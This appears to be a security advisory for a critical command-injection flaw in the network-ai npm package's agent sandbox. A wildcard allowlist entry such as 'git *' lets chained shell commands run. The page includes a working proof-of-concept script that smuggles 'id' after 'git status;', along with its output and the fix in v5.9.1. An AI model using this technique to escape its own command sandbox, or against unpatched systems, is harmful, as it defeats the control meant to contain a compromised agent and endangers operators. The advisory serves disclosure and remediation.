PT-2026-50970 · Npm · Network-Ai
Publicado
2026-06-19
·
Atualizado
2026-06-19
·
CVE-2026-54051
CVSS v3.1
9.9
Crítica
| Vetor | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Summary
The agent sandbox gates shell commands behind an allowlist (
SandboxPolicy.isCommandAllowed), which THREAT MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but ShellExecutor runs that string through /bin/sh -c. So any wildcard allow such as git *, npm * or node * also matches git status; <anything>, and a scoped command becomes arbitrary execution.Root cause
Matching and execution disagree on what a command is. Lines pinned to
40e42d7 (lib/agent-runtime.ts is identical to the v5.8.5 tag).isCommandAllowedmatches the full string, with no tokenizing and no metacharacter check:
globMatchcompiles*to.*and anchors it, sogit *becomes^git .*$and matchesgit status; id:
ShellExecutor.executeonly checksisCommandAllowed, neverrequiresApproval:
spawnCommandruns the approved string via/bin/sh -c, so;,|and$(...)are interpreted by the shell:
Reachability
Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain
git * is enough. No fresh-install precondition and no extra misconfiguration.PoC
Installs
network-ai@5.8.5, allows git *, then runs git status; id > marker.
The allowlist accepts it and the injected id runs.Run:
npm i network-ai@5.8.5 && node poc-316.jsjs
'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');
(async () => {
const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
const marker = path.join(base, 'PWNED-316.txt');
const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
const sh = new ShellExecutor(policy);
const payload = `git status; id > ${marker}; echo INJECTED`;
console.log('version:', require('network-ai/package.json').version);
console.log('allowed:', policy.isCommandAllowed(payload));
await sh.execute(payload);
const ran = fs.existsSync(marker);
console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
console.log(ran ? 'VULNERABLE' : 'not reproduced');
process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });Output:
version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLEImpact
Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (
git *, npm *, node *) can run anything. node * and npm * are direct code exec even without metacharacters.Possible fix
Do not run agent commands through a shell. Parse to argv and
spawn(file, args, { shell: false }), allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus /bin/sh -c is the bug.Patch
Fixed in v5.9.1 (commit
379f776). ShellExecutor now executes via spawn(file, args, { shell: false }) using a quote-aware parsed argv, so no shell is invoked. SandboxPolicy.isCommandAllowed and the new SandboxPolicy.tokenizeCommand reject any unquoted shell metacharacter (; & | $ ( ) < > { }` newline) or unterminated quote before the allowlist glob match; quoted metacharacters are preserved as literal argument data.Remediation: upgrade to
network-ai@5.9.1 or later. As defense in depth, avoid broad wildcard allowlist entries such as node * / npm * which are direct code execution by design.Correção
OS Command Injection
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Network-Ai